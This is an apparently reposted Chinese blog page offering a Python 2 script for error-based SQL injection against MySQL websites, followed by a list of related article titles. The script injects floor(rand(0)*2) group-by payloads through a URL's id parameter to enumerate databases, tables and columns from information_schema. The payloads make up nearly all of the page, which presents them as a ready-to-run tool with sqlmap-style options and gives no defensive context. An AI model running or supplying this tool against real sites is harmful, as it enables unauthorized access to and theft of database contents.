基于报错注入的Python代码
来源:互联网 发布:115个java面试题和答案 编辑:程序博客网 时间:2024/04/29 04:14
能够爆数据库,表,和字段的基于报错注入的Python代码
import reimport sysimport requestsimport binasciidef Get_db(url): url_dbs_num = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select count(distinct table_schema) from information_schema.COLUMNS),0x3a3a3a)a from information_schema.tables group by a)b --+" resp = requests.get(url_dbs_num) html = resp.content db_num = int(re.search(r':::(\d?):::',html).group(1)) print "Database number : %d" % db_num for n in xrange(0,db_num): url_dbs_table = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select distinct table_schema from information_schema.COLUMNS limit %d,1),0x3a3a3a)a from information_schema.tables group by a)b --+" % n resp = requests.get(url_dbs_table) html = resp.content db_name = re.search(r':::(.*?):::',html).group(1) print db_namedef Get_table(url,db_name): db_name = "0x" + binascii.b2a_hex(db_name) url_tables_num = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select count(distinct table_name) from information_schema.COLUMNS where table_schema=%s),0x3a3a3a)a from information_schema.tables group by a)b --+" % db_name resp = requests.get(url_tables_num) html = resp.content tables_num = int(re.search(r':::(\d?):::',html).group(1)) print "tables number : %d" % tables_num for n in xrange(0,tables_num): url_tablename = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select distinct table_name from information_schema.COLUMNS where table_schema=%s limit %d,1),0x3a3a3a)a from information_schema.tables group by a)b --+" % (db_name,n) resp = requests.get(url_tablename) html = resp.content table_name = re.search(r":::(.*?):::",html).group(1) print table_namedef Get_column(url,db_name,table_name): db_name = "0x" + binascii.b2a_hex(db_name) table_name = "0x" + binascii.b2a_hex(table_name) url_columns_num = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select count(distinct column_name) from information_schema.COLUMNS where table_schema=%s and table_name=%s),0x3a3a3a)a from information_schema.tables group by a)b --+" % (db_name,table_name) resp = requests.get(url_columns_num) html = resp.content columns_num = int(re.search(r":::(\d?):::",html).group(1)) print "Columns number : %d" % columns_num for n in xrange(0,columns_num): url_columns_name = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select distinct column_name from information_schema.COLUMNS where table_schema=%s and table_name=%s limit %d,1),0x3a3a3a)a from information_schema.tables group by a)b --+" % (db_name,table_name,n) resp = requests.get(url_columns_name) html = resp.content column_name = re.search(r":::(.*?):::",html).group(1) print column_namedef main(): if sys.argv[2] == '--dbs': Get_db(sys.argv[1]) elif sys.argv[2] == '-D' and sys.argv[4] == '--tables': Get_table(sys.argv[1],sys.argv[3]) elif sys.argv[2] == '-D' and sys.argv[4] == '-T' and sys.argv[6] == '--columns': Get_column(sys.argv[1],sys.argv[3],sys.argv[5])if __name__ == '__main__': main()
1 0
- 基于报错注入的Python代码
- 基于布尔注入的Python代码
- SQL注入--报错注入
- Mysql 报错注入的原理探索
- mysql报错注入
- MySQL 报错注入
- Python代码中中文报错问题解决
- python代码中加入中文报错
- Python代码中中文报错问题解决
- Python代码中中文报错问题解决
- 远程调试Python代码输出报错
- python 远程线程注入代码
- python检测SQL注入的相关代码(参考lijiejie)
- python 写的sqli_lab显错式注入小代码
- SQL注入篇 报错注入
- SQL注入之报错注入
- dll注入的代码
- mysql报错进行回显注入的原理
- Making the Grade poj 3666(离散化+滚动数组+dp)
- win10 U盘安装 ubuntu16.04 双系统
- 第5.7节 把某年中第几天的表示形式转换为某月某日的日期表示形式
- double计算,小数计算,BigDecimal计算,货币计算,float计算,浮点计算
- openlayers 2实现vector图层文字标注
- 基于报错注入的Python代码
- 摆方格
- Linux之Makefile
- 安装Ubuntu 16.04后要做的事
- MySql 修改字段名称和数据类型
- 软件工程-构建之法 学习方法
- 整数拆分 整合算法
- 101. Symmetric Tree 对称树 (难点!)
- Ad-hoc类型同步识别